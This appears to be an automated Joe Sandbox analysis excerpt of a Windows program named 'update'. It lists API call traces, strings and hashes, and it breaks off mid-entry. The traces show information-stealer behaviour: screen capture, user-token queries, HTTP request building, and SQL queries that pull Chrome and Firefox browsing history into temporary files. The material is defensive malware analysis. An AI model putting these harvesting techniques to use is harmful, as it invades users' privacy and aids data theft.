                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00417C51,?,00000000,00000000,?,00418223,00000000,?,?,?), ref: 004178CC
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C51,?,00000000,00000000,?,00418223,00000000,?,?,?), ref: 004178E0
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000017), ref: 0041790B
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417922
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417939
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417950
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417967
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041797E
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417995
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                            • API String ID: 384173800-3355491746
                                                                                                            • Opcode ID: 4c44cd97518fedb02a7e5808d34ed3d9c74ac5f62f9f419dd1205377cafdabec
                                                                                                            • Instruction ID: 31654010b862b105af4b50c917f5d831bb79803e3d83f100470ac79b744d8150
                                                                                                            • Opcode Fuzzy Hash: 4c44cd97518fedb02a7e5808d34ed3d9c74ac5f62f9f419dd1205377cafdabec
                                                                                                            • Instruction Fuzzy Hash: 7FB1F1B19042099BDB10EF65DC86AEFBBB8BB04709F50407BE505F22D1DB78AA458F58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                                                                                                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                                                                                                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                                                                                                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                                                                                                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                                                                                                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195CF,?), ref: 00402778
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                            • API String ID: 2206896924-1825016774
                                                                                                            • Opcode ID: a21f98e2dfab7d3b86ae44e6157d16c69e3d59663961867a37b5d2f4c036abd5
                                                                                                            • Instruction ID: ac0e2f41aa2f423c9d9a8d80f7c11eaba859030c7a64cc794fed102b433a0b1d
                                                                                                            • Opcode Fuzzy Hash: a21f98e2dfab7d3b86ae44e6157d16c69e3d59663961867a37b5d2f4c036abd5
                                                                                                            • Instruction Fuzzy Hash: 2A3139B1A44208AEDB00EBE5CC42F9EBBB8AB49704F50057AF514F71D1DA78AA058B58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                                                                                                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                                                                                                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                                                                                                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                                                                                                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                                                                                                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195CF,?), ref: 00402778
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                            • API String ID: 2206896924-1825016774
                                                                                                            • Opcode ID: 74f53505709ef44e2898c60d809ae1c996b8e31be0853500e01ab79439eee861
                                                                                                            • Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
                                                                                                            • Opcode Fuzzy Hash: 74f53505709ef44e2898c60d809ae1c996b8e31be0853500e01ab79439eee861
                                                                                                            • Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 004170B0
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004170B9
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0041A232,?), ref: 004170C9
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004170D2
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,0041A232,?,00000000,00000000,?,00CC0020), ref: 004170F2
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 00417104
                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 00417192
                                                                                                            • GlobalLock.KERNEL32(?), ref: 0041719C
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 004171BE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 004171C4
                                                                                                            • DeleteDC.GDI32(00000000), ref: 004171CA
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004171D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 734935659-0
                                                                                                            • Opcode ID: c98ac460d9aec4965d51a17cd1e49efe02cdd842e78125eb196d6cf9cfaad22f
                                                                                                            • Instruction ID: d8e405fcbd13f985ed7bb7b3625ce17cc52e98bbe45029a5e74dda917b66e948
                                                                                                            • Opcode Fuzzy Hash: c98ac460d9aec4965d51a17cd1e49efe02cdd842e78125eb196d6cf9cfaad22f
                                                                                                            • Instruction Fuzzy Hash: 6C51FFB1A44209AFDB11DF95EC85FEF77BCAB48305F104066F604E7291CB786A84CB69
APIs
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 0040269F
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026A9
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026C6
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026D0
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026F9
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402703
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402727
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402731
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CharNext
• String ID: "$"
• API String ID: 3213498283-3758156766
• Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
• Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
• Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
• Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
APIs
• GetTickCount.KERNEL32 ref: 004129B8
• 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
• 6BD677D0.KERNEL32(00000000), ref: 00412BD5
Strings
• , xrefs: 00412B68
• .tmp, xrefs: 004129D3
• %TEMP%, xrefs: 004129F3
• SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CountD67450D677Tick
• String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
• API String ID: 2092493435-351388873
• Opcode ID: a74abbfddc2a804f33b1bec9982cfac16ef433aeb40967b99aae19c4185634a2
• Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
• Opcode Fuzzy Hash: a74abbfddc2a804f33b1bec9982cfac16ef433aeb40967b99aae19c4185634a2
• Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58
APIs
• GetTickCount.KERNEL32 ref: 00412580
• 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
• 6BD677D0.KERNEL32(00000000), ref: 0041279D
Strings
• SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
• .tmp, xrefs: 0041259B
• , xrefs: 00412730
• %TEMP%, xrefs: 004125BB
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CountD67450D677Tick
• String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
• API String ID: 2092493435-462058183
• Opcode ID: f7e9225fd83f2c52edbe2e774f54d6d797bcc424be62889ade88ac8b0a8b95a9
• Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
• Opcode Fuzzy Hash: f7e9225fd83f2c52edbe2e774f54d6d797bcc424be62889ade88ac8b0a8b95a9
• Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58
APIs
  • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
  • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
• GetCommandLineA.KERNEL32 ref: 00404CD7
• GetVersion.KERNEL32 ref: 00404CEB
• GetVersion.KERNEL32 ref: 00404CFC
• GetCurrentThreadId.KERNEL32 ref: 00404D38
  • Part of subcall function 00402AC4: 6BD67FA0.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
  • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
  • Part of subcall function 00402AC4: 6BD67B60.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
• GetThreadLocale.KERNEL32 ref: 00404D18
  • Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: KeyboardLocaleThreadTypeVersion$CommandCurrentInfoLineQueryValue
• String ID: 85q
• API String ID: 4194211594-1342893606
• Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
• Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
• Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
• Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
• GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A232,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436), ref: 004033BC
• WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A232,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436), ref: 004033C2
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
• Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
• Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
• Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
APIs
• GetTickCount.KERNEL32 ref: 00411315
• 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
• 6BD677D0.KERNEL32(00000000), ref: 00411544
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CountD67450D677Tick
• String ID: $%TEMP%$.tmp
• API String ID: 2092493435-2792595090
• Opcode ID: db1cd16a4fb912c04a68405bb93bc2507ea4c30ea1d340a0ead4ef04d239a916
• Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
• Opcode Fuzzy Hash: db1cd16a4fb912c04a68405bb93bc2507ea4c30ea1d340a0ead4ef04d239a916
• Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59
APIs
• LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
• LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID:
• API String ID: 2238633743-0
• Opcode ID: 70de9e30ba6dd60e2478134cb3d455c36d88d80a3fb17b1fee90f1f096944140
• Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
• Opcode Fuzzy Hash: 70de9e30ba6dd60e2478134cb3d455c36d88d80a3fb17b1fee90f1f096944140
• Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8
APIs
• GetTickCount.KERNEL32 ref: 00410DCC
• 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
• 6BD677D0.KERNEL32(00000000), ref: 00410F84
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CountD67450D677Tick
• String ID: %TEMP%$.tmp
• API String ID: 2092493435-3650661790
• Opcode ID: 52a40d82767056af8fc75b760fd5bf277d3ec1bd90016c77cebdb1831855ff50
• Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
• Opcode Fuzzy Hash: 52a40d82767056af8fc75b760fd5bf277d3ec1bd90016c77cebdb1831855ff50
• Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 00411230
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2092493435-3650661790
                                                                                                            • Opcode ID: 3f235d18d13c86ff430b1fb222f05703180447fa8830be5146bc8e03c8a55f78
                                                                                                            • Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
                                                                                                            • Opcode Fuzzy Hash: 3f235d18d13c86ff430b1fb222f05703180447fa8830be5146bc8e03c8a55f78
                                                                                                            • Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58
                                                                                                            APIs
                                                                                                            • 6BD67FA0.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                            • 6BD67B60.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                            • API String ID: 3660427363-4173385793
                                                                                                            • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                            • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                            • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                            • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A4C,00000000,00416D10,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A4C,00000000,00416D10,?,Windows : ,?,,?), ref: 0040669B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                            • API String ID: 4190356694-3024904723
                                                                                                            • Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                                                                                                            • Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
                                                                                                            • Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                                                                                                            • Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: dfa750a07d6b472cd75f50a97ce69af4c84a8d84dfcfe63392ef10f97b45f9bb
                                                                                                            • Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
                                                                                                            • Opcode Fuzzy Hash: dfa750a07d6b472cd75f50a97ce69af4c84a8d84dfcfe63392ef10f97b45f9bb
                                                                                                            • Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
